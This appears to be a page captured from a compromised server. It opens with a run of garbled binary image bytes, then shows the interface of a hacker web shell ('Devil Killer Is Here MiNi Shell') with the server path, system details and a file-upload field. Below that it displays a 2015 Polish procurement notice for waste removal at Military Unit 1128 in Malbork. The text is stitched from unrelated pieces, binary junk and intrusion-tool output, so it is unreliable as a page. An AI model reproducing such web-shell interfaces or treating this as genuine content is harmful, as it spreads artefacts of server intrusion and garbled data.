JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151123/314990-N-2015.html

<p class="kh_header"><b>Malbork: Odbiór, załadunek, transport i unieszkodliwienie odpadów komunalnych 
niesegregowanych i segregowanych z terenu obiektów wojskowych 
administrowanych przez Jednostkę Wojskową 1128 w Malborku</b><br>
<b>Numer ogłoszenia: 314990 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1128 , ul. 17 Marca 20, 82-200 Malbork, woj. pomorskie, tel. 261 536 216, 261 536 713, faks 261 536 275, 262 536 713.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22blot.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór, załadunek, transport i unieszkodliwienie odpadów komunalnych 
niesegregowanych i segregowanych z terenu obiektów wojskowych 
administrowanych przez Jednostkę Wojskową 1128 w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór, załadunek, transport oraz unieszkodliwienie: 
-  niesegregowanych odpadów komunalnych - kod odpadu 20 30 01; 
-  segregowanych  odpadów  komunalnych  -  kod  odpadu  20 01 01,  20 01 02,  20 01 39,  20 03 07.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje  możliwości  udzielenia  zamówień  uzupełniających,  o  których  mowa                     
w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  zamówień  publicznych  do  20%  wartości  zamówienia 
podstawowego  i  polegających  na  powtórzeniu  tego  samego  rodzaju  zamówień  z  zastrzeżeniem 
wykonania prac na innych kompleksach</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium. 
2. Ustala się wadium dla przedmiotu zamówienia w wysokości:  
Dla części 1 - 1.800,00 zł (słownie: jeden tysiąc osiemset 00/100 złotych) 
Dla części 2 - 500,00 zł (słownie: pięćset 00/100 złotych)
Dla części 3 - Zamawiający odstępuje od wymogu wniesienia wadium.
Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie: 
1) w pieniądzu, przelewem na rachunek bankowy Narodowy Bank Polski Oddział Okręgowy Gdańsk 
nr  Konta  29 1010  1140  0173  1413  9120  1000  z  adnotacją  
wadium  - Odbiór, załadunek, transport i unieszkodliwienie odpadów komunalnych
niesegregowanych i segregowanych z terenu obiektów wojskowych
administrowanych przez Jednostkę Wojskową 1128 w Malborku
- Nr sprawy ZP/135/XI/2015/NJ
2)  w  poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo  -  kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3) w gwarancjach bankowych,  
4) w gwarancjach ubezpieczeniowych  
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)  
2.  Za  termin  wniesienia  wadium  w  formie  przelewu  pieniężnego  przyjmuje  się  termin  uznania  na rachunku zamawiającego.  
3. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46. 
4.  Wadium  wnoszone  w  pieniądzu  wpłaca  się  przelewem  na  rachunek  bankowy:  Narodowy Bank Polski Oddział Okręgowy Gdańsk nr Konta 29 1010 1140 0173 1413 9120 1000 z adnotacją wadium -    Odbiór, załadunek, transport i unieszkodliwienie odpadów komunalnych  niesegregowanych i segregowanych z terenu obiektów wojskowych administrowanych przez Jednostkę Wojskową 1128 w Malborku  -  Nr sprawy ZP/135/XI/2015/NJ  
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy  czym  za  termin  wniesienia  wadium  w  formie  pieniężnej  przyjmuje  się  termin  uznania  na rachunku bankowym zamawiającego. 
7.  Wadium  wniesione  w  pieniądzu,  zostanie  zwrócone  wraz  z  odsetkami  wynikającymi  z  umowy rachunku  bankowego,  na  którym  było  ono  przechowywane,  pomniejszone  o  koszty  prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą  w osobnej kopercie natomiast potwierdzoną kopię tego dokumentu należy wpiąć do oferty lub złożyć w kasie w siedzibie Zamawiającego bud. Nr 1 I piętro - kasa czynna w dni powszednie: poniedziałek, wtorek, czwartek, piątek w godzinach 11:00 - 14:00. 
9.  Polisa,  poręczenie,  gwarancja  lub  inny  dokument  stanowiący  formę  wadium  winno  zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie  z  warunkami  specyfikacji  istotnych  warunków  zamówienia,  następuje  jego  bezwarunkowa wypłata  bez  jakichkolwiek  zastrzeżeń  ze  strony  gwaranta  /poręczyciela.  Niedopuszczalny  jest również  zapis  żądający  potwierdzenia  przez  notariusza  lub  bank,  że  podpisy  na  żądaniu  do zapłaty  zostały  złożone  przez  osoby  uprawnione  do  zaciągania  zobowiązań  majątkowych Zamawiającego.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca  zostanie  wykluczony  z  udziału  w  postępowaniu,  a  jego  oferta  podlegać  będzie odrzuceniu. 
11.  Zamawiający  zwróci  niezwłocznie  wadium  wszystkim  wykonawcom  po  wyborze 
najkorzystniejszej  oferty  lub  unieważnieniu  postępowania,  z  wyjątkiem  wykonawcy,  którego  oferta zostanie wybrana jako najkorzystniejsza. 
12.  Wykonawcy,  którego  oferta  zostanie  wybrana  jako  najkorzystniejsza,  Zamawiający  zwróci wadium niezwłocznie po zawarciu umowy. 
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
upływem terminu składania ofert. 
14. Zamawiający zatrzymuje wadium wniesione w postępowaniu, w sytuacji zaistnienia przesłanek 
art. 46 ust. 4a i 5 ustawy Pzp, jeżeli Wykonawca: 
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po 
jego  stronie,  nie  złożył  dokumentów  lub  oświadczeń  o  których  mowa  w  art.  25  ust.  1, 
pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w 
art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził 
zgody na  poprawienia  omyłki,  o  której  mowa  w  art.  87  ust.  2  pkt.  3, co  powodowało  brak możliwości  wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej, 
- którego  oferta  została  wybrana  odmawia  podpisania  umowy  na  warunkach  określonych 
w ofercie, nie wniósł zabezpieczenia należytego wykonania umowy lub zawarcie umowy stało 
się niemożliwe z przyczyn leżących po stronie wykonawcy. 
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania 
specjalnych uprawnień, 
Zamawiający uzna, że warunek zostanie spełniony, jeżeli wykonawca:
- posiada aktualny wpis do Rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych  od  właścicieli  nieruchomości  prowadzonym  w  Urzędzie  Miasta/Gminy                     
(dla każdego zadania) wydanego na podstawie art. 9b Ustawy z dnia 13 września 1996r.  o utrzymaniu czystości i porządku w gminach (Dz. U. 2012 poz. 391 z późn. zm.).;
- aktualne zezwolenie  wydane w drodze decyzji przez właściwy organ administracji państwowej  na  prowadzenie  działalności  w  zakresie  transportu,  zbierania  i/lub unieszkodliwiania  odpadów,  stanowiącego  przedmiot  zamówienia  (w  zależności  od rodzaju prowadzonej działalności) na podstawie ustawy z dnia 14.12.2012 o odpadach (Dz.  U.  z  2013  poz.  21  z  późn.  zm)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony Formularz ofertowy , b)	Uzasadnienie, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa 
w przypadku wskazania w ofercie informacji stanowiących tajemnicę przedsiębiorstwa 
w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, zastrzeżenia ich 
przez Wykonawcę, że nie mogą być one udostępniane. Ponadto dokumenty stanowiące tajemnicę przedsiębiorstwa powinny być umieszczone w oddzielnej kopercie z napisem Tajemnica przedsiębiorstwa.,c)	Pełnomocnictwo osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych , d)	Dokument potwierdzający wniesienie wadium (wymagany gdy Wykonawca wnosi wadium w innej formie niż pieniężna) 
,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę na warunkach określonych w projekcie umowy stanowiącym załącznik nr 2 do SIWZ.
2.	Zamawiający, zgodnie z art. 144 Ustawy Pzp, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2. 1.	Za siłę wyższą, o której mowa w niniejszej umowie, Zamawiający uzna zdarzenia nadzwyczajne, zewnętrzne  o  charakterze  nadzwyczajnym,  niezależne  od  woli  Stron  po  zawarciu  niniejszej umowy,  które  nie  udało  się  zapobiec  przy  zachowaniu  należytej  staranności,  skutkujące niemożliwością świadczenia usługi, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym.
2. 2.	Gdy zaistnieje inna okoliczność prawna, ekonomiczna, techniczna lub organizacyjna skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ - w zakresie zmiany terminu wykonania przedmiotu zamówienia.
2. 3.	W przypadku ustawowej zmiany stawki podatku VAT wartość należnego wynagrodzenia zostanie skorygowana poprzez dodanie do wartości netto należnego wynagrodzenia kwoty podatku VAT zgodnie z obowiązującą stawką. 
2. 4.	jeżeli  umowa  nie  może  być  wykonana  w  terminie  z  przyczyn  leżących  po  stronie Zamawiającego
2. 5.	jeżeli  umowa  nie  może  być  wykonana  w  terminie  z  przyczyn  niezawinionych  przez Wykonawcę
3.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ppkt 2.1, 2.2 i 2.3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
4.	Zamawiający dopuszcza możliwość zmiany umowy w szczególności w następujących przypadkach i na następujących warunkach:
i.	zmiany w zakresie wskazanych dla realizacji umowy Podwykonawców  -                      w przypadku gdy w szczególności  Podwykonawca  wadliwie  wykonuje  umowę,  w  tym  zaprzestał  jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy - w tym Podwykonawców na zasobach,  których  Wykonawca  opierał  się  wykazując  spełnianie  warunków  udziału w postępowaniu  pod  warunkiem,  że  nowy  Podwykonawca  wykaże  spełnianie  warunków 
w zakresie nie mniejszym niż wymagane w SIWZ, wprowadzenie podwykonawcy pomimo braku jego wskazania w ofercie,
ii.	istotnych  zmian  w  przepisach  ustawowych  i  aktach  wykonawczych  związanych z przedmiotem zamówienia, które nastąpiły po dniu podpisania umowy
iii.	zmiana  świadczenia  Wykonawcy  usługi  na  lepszej  jakości  -  przy  zachowaniu  tożsamości przedmiotu zamówienia
5.	Wszystkie postanowienia wymienione jw.  w stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
6.	W  przypadku  wystąpienia  którejkolwiek  z  okoliczności  wymienionych  ust.  2  termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonywania w sposób należyty,  nie dłużej jednak niż o okres trwania tych okoliczności. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania  usługi, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania usług. 
7.	O wystąpieniu  jakichkolwiek  okoliczności  mogących  wpłynąć  na  terminowość  wykonania przedmiotu  umowy  Wykonawca  jest  zobowiązany  powiadomić  Zamawiającego  na  piśmie w terminie 7 dni od dnia wystąpienia tych okoliczności pod rygorem nieuwzględnienia ich przez Zamawiającego. 
8.	Zmiana  umowy  powinna  nastąpić  w  formie  pisemnego  aneksu  sporządzonego  przez Zamawiającego  i  podpisanego  przez  strony  umowy,  pod  rygorem  nieważności  takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne. 
9.	Zmiana do  umowy  w  sprawie  zamówienia  publicznego  bez  zachowania  formy  pisemnej  jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
10.	Nie stanowią zmiany umowy w rozumieniu art. 144 Ustawy Pzp:
a)	zmiana danych teleadresowych,
b)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy, np. osoby wyznaczone do kontaktów lub odpowiedzialne za realizację umowy,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych,
d)	zmiany terminu dostawy spowodowane przedłużeniem się procedury oceny ofert.
11.	ZAMAWIAJĄCY zastrzega sobie prawo do zmiany istotnych postanowień umownych                w zakresie:
11.1.	zmiany wartości zamówienia,
12.2.	zmiany kompleksu wojskowego, na którym wykonywane będą zobowiązania wynikające z umowy,
13.3.	zmiany terminu wykonywania zamówienia,
13.4.	zmiany lokalizacji ustawienia kontenerów w danym kompleksie,
13.5.	zamiany rodzaju wywożonych nieczystości segregowanych do limitu wartości umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22blot.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1128
ul. 17 Marca 20
82-200 Malbork 
Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 10:00, miejsce: Kancelaria Jawna
Jednostka Wojskowa 1128
ul. 17 Marca 20
82-200 Malbork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa odbioru, załadunku, transportu
oraz unieszkodliwiania niesegregowanych i segregowanych odpadów komunalnych
z terenu Jednostki Wojkowej 1128 w Malborku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Odbiór,  załadunek,  transport  i  unieszkodliwianie  niesegregowanych  odpadów  komunalnych  
w Jednostce Wojskowej 1128 w Malborku w szacowanej  ilości 1 768,48  m3 na rok.  
2.  Odbiór,  załadunek,  transport  i  unieszkodliwianie  segregowanych  odpadów  komunalnych  
w Jednostce Wojskowej 1128 w Malborku wskazanej poniżej planowanej ilości na rok: 
1.1.	  20 01 01 - 122,36 m3,
1.2.	  20 01 02 - 24,40 m3,
1.3.	  20 01 39 - 46,20 m3,
1.4.	  20 03 07 - 14,00 m3.
3.  Szczegółowy wykaz obiektów na terenie, których prowadzona będzie usługa: 
a)  Koszary ul. 17 Marca 20, Malbork, 
b)  Koszary ul. Jagiellońska 16, Malbork, 
c)  Klub Garnizonowy przy ul. Sikorskiego 33, Malbork, 
d)  Lotnisko Królewo Malborskie, 
e)  Obiekt Techniczny Lasowice Wielkie.

Szczegółowy  zakres  prac  do  wykonania  został  określony  w  załączonych  do  specyfikacji  istotnych warunków zamówienia dokumentach a w szczególności w:  
a)  Opis przedmiotu zamówienia 
b)  Projekcie umowy.</p></li>
